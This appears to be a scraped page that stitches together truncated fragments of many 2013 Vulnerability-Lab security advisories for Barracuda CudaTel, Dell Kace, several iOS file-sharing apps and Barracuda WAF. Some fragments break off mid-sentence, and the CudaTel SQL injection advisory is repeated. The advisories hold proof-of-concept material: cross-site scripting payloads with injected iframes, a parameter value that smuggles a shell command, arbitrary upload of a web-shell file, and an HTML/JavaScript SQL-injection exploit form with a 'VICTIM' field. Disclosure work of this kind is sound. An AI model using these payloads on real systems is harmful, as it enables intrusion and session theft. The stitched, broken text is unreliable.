Barracuda Networks Product: CudaTel - Communication Server 2.6.002.040 Exploitation-Technique: === Remote Severity: = Medium Details: A client side input validation vulnerability is detected in Barracuda Networks CudaTel v2.6.002.040 appliance application. The non-persistent vulnerability allows remote attackers to manipulate website links to provoke malicious client side (application-side) requests. The secound vulnerability (client side) is located in the `error:Internal Error` exception handling. When remote attackers provoke to load an invalid request the exception-handling will display the earlier inserted bbx_hostname (malicious) web context (exp. script codes). The attacker can use the vulnerable bbx_backup_site_host parameter of the test connection listing module to provoke an evil application exception-handling request. Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side external redirects to malware or evil websites. Exploitation of the vulnerability requires medium application user interaction. Vulnerable Section(s): [+] Test - Connection Vulnerable Module(s): [+] Exception-handling [Internal Error] - Listing Vulnerable Parameter(s): [+] bbx_backup_site_host Proof of Concept: = The vulnerability can be exploited by remote attackers with low or medium required user interaction and without privileged application user account. For demonstration or reproduce ... Review: Exception-handling [Internal Error] - Listing [bbx_backup_site_host] pre--- error: Internal error.\n[backup] Can't connect to \iframe src=test3-Dateien/a.htm href=http://vuln-lab.com/?content-type=text/html;http://vuln-lab.com/a /pre/body/html/iframe/pre PoC: http://cudatel.ptest.cudasvc.com/gui/backup/test ?_=1353975862209bbx_backup_site_id=2bbx_backup_site_type=ftp bbx_backup_site_host=%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3Ebbx_backup_site_port=8bbx_backup_site_user=BENJAMINKM bbx_backup_site_path=%2F+%26+echo+%3E+%2Fdata%2Fsounds%2Fmusic%2F8%2F2a10577f-6764-4368-8571-44d42e4695ff Solution: = The vulnerability can be patched by parsing the vulnerable bbx_backup_site_host parameter request. Parse the internal error exception-handling when processing to display the error string of the requested parameter. (error context) 2013-04-03: Vendor Fix/Patch Note: Barracuda Networks provided a download in the customer section but also automatic update to patch the issue in the appliance series. Risk: = The security risk of the client side input validation vulnerability is estimated as medium(-) because of the main location in the exception-handling. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either
Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities
are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Ibrahim Mosaad El-Sayed [ibra...@evolution-sec.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities
in the index file dir listing module of the web-server (http://localhost:8797/) when processing to display via POST request method injected manipulated `folder names`. The persistent script code will be executed in the main index file dir listing module when the service lists the new malicious injected foldername as item. Exploitation of the persistent web vulnerability requires low or medium user interaction without application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Application(s): [+] Olive File Manager v1.0.1 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Add Folder Vulnerable Parameter(s): [+] foldername Affected Module(s): [+] Index Folder Listing (http://localhost:8797/) Proof of Concept: = 1.1 The file include and arbitrary file upload vulnerability can be exploited by remote attackers without privilege application user account and without required user interaction. For demonstration or reproduce ... PoC: Filename div class=file_list_containerdiv class=file_list_itemtable height=50px border=0 cellpadding=0 cellspacing=0 width=100%tbodytrtd align=center valign=middle width=50/tdtd align=left valign=middle width=*a href=/a /td/tr/tbody/table/divdiv class=file_list_itemtable height=50px border=0 cellpadding=0 cellspacing=0 width=100%tbodytrtd align=center valign=middle width=50/tdtd align=left valign=middle width=*a href=[LOCAL FILE/PATH REQUEST!]/a (Size:27,27 Kb, Last Modified:2013-07-12 18:34:15)br / /td/tr/tbody/table/divdiv class=file_list_itemtable width=100% height=50px border=0 cellpadding=0 cellspacing=0tbodytrtd width=50 align=center valign=middle/tdtd width=* align=left valign=middlea href=[LOCAL FILE/PATH REQUEST!]/a (Size:27,27 Kb, Last Modified:2013-07-12 18:33:42)br / /td/tr/tbody/table/div/div/divdiv class=footerdiv class=footer_textCopyright © 2008 OliveOffice,Inc. /div/div/body/html/iframe/a/td/tr/tbody/table/div/div --- POST Method Request Log --- POST_DATA[-151253266715950 Content-Disposition: form-data; name=file; filename=[LOCAL FILE/PATH REQUEST!].png Content-Type: image/png 1.2 the persistent input validation web vulnerability can be exploited by remote attackers without privilege application user account and with low or medium required user interaction. For demonstration or reproduce ... PoC: Foldername div class=file_list_containerdiv class=file_list_itemtable height=50px border=0 cellpadding=0 cellspacing=0 width=100%tbodytrtd align=center valign=middle width=50/tdtd align=left valign=middle width=*a href=/a /td/tr/tbody/table/divdiv class=file_list_itemtable height=50px border=0 cellpadding=0 cellspacing=0 width=100%tbodytrtd align=center valign=middle width=50/tdtd align=left valign=middle width=*a href=%20[PERSISTENT INJECTED SCRIPT CODE!] [PERSISTENT INJECTED SCRIPT CODE!]/%20 [PERSISTENT INJECTED SCRIPT CODE!]//a (Size:0 Kb, Last Modified:2013-07-12 18:26:31)br / /td/tr/tbody/table/div/div/divdiv class=footerdiv class=footer_textCopyright © 2008 OliveOffice,Inc. /div/div/body/html/iframe/a/td/tr/tbody/table/div/div Solution: = 1.1 The arbitrary file upload web vulnerability and the upload filter bypass issue is estimated as high(+). 1.2 The security risk of the persistent input validation vulnerabilities is estimated as high(-). Risk: = The security risk of the persistent input validation web vulnerability is estimated as high(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad
WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities
: = The vulnerability can be patched by a restriction of the json upload request and url parameter. The POST request when processing to upload needs to be restricted, encoded and filtered. Risk: = The security risk of the local file/path include arbitrary file upload vulnerability is estimated as high. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Flux Player v3.1.0 iOS - File Include Arbitrary File Upload Vulnerability
,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://localhost:8080/] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[669] Date[Mo., 15 Jul 2013 20:05:02 GMT] 1.2 --- Request Session Log 2 - Arbitrary File Upload --- Status: 200[OK] POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[1053] Mime Type[application/x-unknown-content-type] Request Headers: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://localhost:8080/] Connection[keep-alive] Post Data: POST_DATA[-21961286324572 Content-Disposition: form-data; name=file; filename=schoko-drops-337.gif.html.php.js.jpg Content-Type: image/png --- Status: 200[OK] GET http://localhost:8080/schoko-drops-337.gif.html.php.js.jpg [Included File/Path as Filename!] Load Flags[LOAD_DOCUMENT_URI ] Content Size[669] Mime Type[application/x-unknown- content-type] Request Headers: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept [text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://localhost:8080/] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[669] Date[Mo., 15 Jul 2013 20:05:05 GMT] Note: After the upload of the manipulated malicious file (shell or web-shell), the remote attacker is able to access the full files by a delete of the image file extension. Its also possible to upload a file with multiple file extensions and to access with another frame. PoC: htmlheadtitleFiles from /titlestylehtml {background-color:#ee} body { background-color:#FF; font-family:Tahoma,Arial,Helvetica,sans-serif; font- size:18x; margin-left:15%; margin-right:15%; border:3px groove #006600; padding:15px; } /style/head bodyh1Files from /h1bqThe following files are hosted live from the strongiPhone's/strong Docs folder./bqpa href=/abr a href=.DownloadStatus.DownloadStatus/a ( 0.0 Kb, (null))br a href=.mpdrm.mpdrm/a ( 0.0 Kb, (null))br a href=iframe src=a_[File Include/Arbitrary File Upload Vulnerability!]/a(0.0 Kb, (null))br / a href=BKM337/a ( 0.0 Kb, (null))br / a href=Rem0veRem0ve/a ( 0.0 Kb, (null))br / a href=a2b642e7de.jpga2b642e7de.jpg/a ( 0.0 Kb, (null))br / /pform action= method=post enctype=multipart/form-data name=form1 id=form1labelupload file input type=file name=file id=file //labellabelinput type=submit name=button id=button value=Submit //label/form/body/html/iframe/a/p/body/html Note: To exploit the issue the attacker needs to bypass the validation by an inject of 2 different scripts (tags). After the upload the local file or path gets executed when processing to open the item listing. Solution: = 1.1 The vulnerability can be patched by a secure parse of the filenames when processing to upload via POST method request. Encode and parse the filename output listing in the index site of the application. Restrict the filename name input and disallow special chars. 1.2 Restrict the input of the filenames when processing to upload a file with multiple extension. Encode and parse the filename output listing in the index site of the application. Restrict the filename name input and disallow special chars. Disallow to open urls with multiple file extensions to prevent execution or access to web-shells. Risk: = 1.1 The security risk of the local file include web vulnerability is estimated as high. 1.2 The security risk of the arbitrary file upload vulnerability is estimated as high(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do
Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17)
bbx_outbound_route_name: [CLIENT-SIDE SCRIPT CODE!] bbx_outbound_route_regex: ^\\d{10}$ bbx_outbound_route_type: national /pre/body/html/iframe#8203;#8203;#8203;#8203;#8203;/pre PoC: http://cudatel.127.0.0.1:1338/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C http://cudatel.127.0.0.1:1338/gui/route/route?_=1354073910062bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C 1.2 Review: AJAX - HTML queues_wall_stub - Monitor Queue Link ops opOpenQueueWallboard h3Queue Monitor a class=ops opOpenQueueWallboard href=#Large View in New Window/a/h3 PoC: http://cudatel.127.0.0.1:1338/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C# 1.3 Review: Eventlog eventlog - Web login attempt fail (Exception Handling) - Listing bbx_eventlog_message - bbx_eventlog_date_time: 2012-11-26 15:25:59 bbx_eventlog_email_sent: 0 bbx_eventlog_fullname: Admin bbx_eventlog_id: 2823 bbx_eventlog_ip_addr: 178.200.236.201 bbx_eventlog_message: Web login attempt fail for [x]%20%20split%20%20[CLIENT-SIDE SCRIPT CODE!]) from 178.200.236.201 bbx_eventlog_priority: notice bbx_eventlog_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0 bbx_user_id: 1 - PoC: http://cudatel.127.0.0.1:1338/gui/eventlog/eventlog?%3Cx%3E%20%20%20%20%22%3E%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C Reference(s): http://cudatel.ptest.cudasvc.com/gui/route/route http://cudatel.ptest.cudasvc.com/ajax-html/queues_wall_stub.html http://cudatel.ptest.cudasvc.com/gui/eventlog/eventlog Risk: = The security risk of the (multiple) client side input validation vulnerabilities are estimated as medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Download Lite v4.3 iOS - Persistent File Web Vulnerability
is processing to open the index listing. Solution: = The vulnerability can be patched by a secure encoding and parse of the file name in the main file dir listing index module of the application. Risk: = The security risk of the persistent input validation web vulnerability is estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Barracuda LB, SVF, WAF WEF - Multiple Vulnerabilities
ExtpZnJhbWUgc3JjYSBvbmxvYWRhbGVydFZMICAxJTAjBgNVBAoTHGlmcmFtZSBz cmNhIG9ubG9hZGFsZXJ0VkwgIDMxJTAjBgNVBAsTHGlmcmFtZSBzcmNhIG9ubG9h ZGFsZXJ0VkwgIDQxJDAiBgNVBAMTG2lmcmFtZXNyY2FvbmxvYWRhbGVydHZsZ29h bDEqMCgGCSqGSIb3DQEJARYbYWRtaW5AdnVsbmVyYWJpbGl0eS1sYWIuY29tggEA MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBABiGKfDora8sj8YWgnFb WNyvnkaah5Ds21nFaN5I3ReSPLDGEAdRYSI3K9g9LjHLIkyUT2kDChLXPnm6Gbuu BVGUKQpZV+ORbB5J1NvmFJlyCVU+3PmU5JFggmsuBRSI1sIsUvyVdRxeasnhlw7i ZwtWAz1D13+zfb60QZc+Ekvn2d2RKFQ5eWxGrlEZ3niRjcO9Jr/HVE66HTzf6AUn r1zcu/7IqNr9wI0I9cQx2lnR9GgpSP3gBH7F5SXw6b1dLvHVIgcnd62JzyJNrQ1B dQYTStsbK710ik9OKq86j8tgQ9Q0TdLh7t9KncRmlZtxZSeYkzM9j1vdDpSrMMHU 3xU= -END CERTIFICATE- Solution: = The vulnerabilities can be patched by parsing the affected (displayed) certificate value(s) output listing. Restrict and parse the input fields (function) of trusted and self signed certificates values to prevent future executions out of the certificate context. Risk: = The security risk of the persistent input validation web vulnerabilities are estimated as high(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability
interaction. For demonstration or reproduce ... Standard Request: Row 100 http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509since=1+daysearch_string=rows=100page=1sortby=end_timestampsortorder=desc Standard Request: Output --- 1. {count:0,page:1,cdr:[],rows:100} Manipulated Request: http://cudatel.127.0.0.1:1337/gui/cdr/cdr? _=1353973149509since=1+daysearch_string=rows=100page='1+1%27[SQL-Injection!]%27--sortby=end_timestampsortorder=desc ... or http://cudatel.127.0.0.1:1337/gui/cdr/cdr? %20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows='1+1%27[SQL-Injection!]%27--page=1sortby=end_timestampsortorder=desc Manipulated Output: --- 1. cdr: [] count: 0 page: 1 rows: 1+2 --- 1. cdr: [] count: 1+2' page: - '1335 - '1336 - '1337 - '1 rows: -1+1'[SQL-Injection!]'-- Exploit (PoC): htmlheadbodymeta http-equiv=Content-Type content=text/html; charset=iso-8859-9 titleBarracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection [PROOF OF CONCEPT]/title script language=JavaScript var path=/gui/cdr/cdr var adres=?%20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows= var domain =http://cudatel.127.0.0.1:1337; var sql = '1+1%27[SQL-Injection!]%27-- function command(){ if (document.rfi.target1.value==){ alert(NOPE!); return false; } rfi.action= document.rfi.target1.value+path+adres+domain+sql; rfi.submit(); } //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Barracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection Exploit //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Vulnerability Research Laboratory (www.vulnerability-lab.com) //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD. Stealthwalker //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- /script/headbody bgcolor=#00 link=#99 centerp align=centerbfont face=Verdana size=2 color=#006633Barracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection Exploit/font /b/pform method=post target=getting name=rfi onSubmit=command();div align=left pbfont face=Arial size=2 color=#006633VICTIM:/font/b input type=text name=target1 size=53 style=background-color: #006633 onMouseOver=javascript:this.style.background='#808080'; onMouseOut=javascript:this.style.background='#808000';/p pbfont face=Arial size=2 color=#006633EXAMPLE:/fontfont face=Arial size=2 color=#808080 HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]//font/b/p/div p align=leftinput type=submit value=Execute INPUT name=B1 /pp align=leftinput type=reset value=Clear ALL name=B2/p/formpbr iframe name=getting height=337 width=633 scrolling=yes frameborder=0/iframe/pdiv align=left p align=centerbfont face=Verdana size=2 color=#008000VULNERABILITY-LAB a href=mailto:resea...@vulnerability-lab.com; BKM/a/font/b/p/div/center/body/html 1.2 The client side input validation vulnerability can be exploited by remote attackers without application user account and with medium required user interaction. For demonstration or reproduce ... PoC: http://cudatel.127.0.0.1:1336/gui/cdr/cdr? _=1353973149509since=1+daysearch_string=rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]page=1sortby=end_timestampsortorder=desc http://cudatel.127.0.0.1:1336/gui/cdr/cdr? _=1353973149509since=1+daysearch_string=rows=100page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]sortby=end_timestampsortorder=desc Note: We only verified the bug with the same exception in a not parsed parameter but the bug itself is located in all areas of the invalid exception. Solution: = 1.1 To patch the sql injection it is required to parse the row and page parameters in the cdr module. 1.2 To fix the client side xss vulnerability parse by encoding the row parameter and restrict the input. Encode the affected exception-handling output listing when processing to display invalid input values. Note: Barracuda Networks provided an update of version 2.6.002.040 to v2.6.003.x to all clients and customers in the bn customer area. Risk: = 1.1 The security risk of the remote sql injection web vulnerability is estimated critical. 1.2 The security risk of the client side input validation web vulnerability is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
Barracuda CudaTel 2.6.02.040 - SQL Injection Vulnerability
interaction. For demonstration or reproduce ... Standard Request: Row 100 http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509since=1+daysearch_string=rows=100page=1sortby=end_timestampsortorder=desc Standard Request: Output --- 1. {count:0,page:1,cdr:[],rows:100} Manipulated Request: http://cudatel.127.0.0.1:1337/gui/cdr/cdr? _=1353973149509since=1+daysearch_string=rows=100page='1+1%27[SQL-Injection!]%27--sortby=end_timestampsortorder=desc ... or http://cudatel.127.0.0.1:1337/gui/cdr/cdr? %20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows='1+1%27[SQL-Injection!]%27--page=1sortby=end_timestampsortorder=desc Manipulated Output: --- 1. cdr: [] count: 0 page: 1 rows: 1+2 --- 1. cdr: [] count: 1+2' page: - '1335 - '1336 - '1337 - '1 rows: -1+1'[SQL-Injection!]'-- Exploit (PoC): htmlheadbodymeta http-equiv=Content-Type content=text/html; charset=iso-8859-9 titleBarracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection [PROOF OF CONCEPT]/title script language=JavaScript var path=/gui/cdr/cdr var adres=?%20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows= var domain =http://cudatel.127.0.0.1:1337; var sql = '1+1%27[SQL-Injection!]%27-- function command(){ if (document.rfi.target1.value==){ alert(NOPE!); return false; } rfi.action= document.rfi.target1.value+path+adres+domain+sql; rfi.submit(); } //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Barracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection Exploit //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Vulnerability Research Laboratory (www.vulnerability-lab.com) //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD. Stealthwalker //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- /script/headbody bgcolor=#00 link=#99 centerp align=centerbfont face=Verdana size=2 color=#006633Barracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection Exploit/font /b/pform method=post target=getting name=rfi onSubmit=command();div align=left pbfont face=Arial size=2 color=#006633VICTIM:/font/b input type=text name=target1 size=53 style=background-color: #006633 onMouseOver=javascript:this.style.background='#808080'; onMouseOut=javascript:this.style.background='#808000';/p pbfont 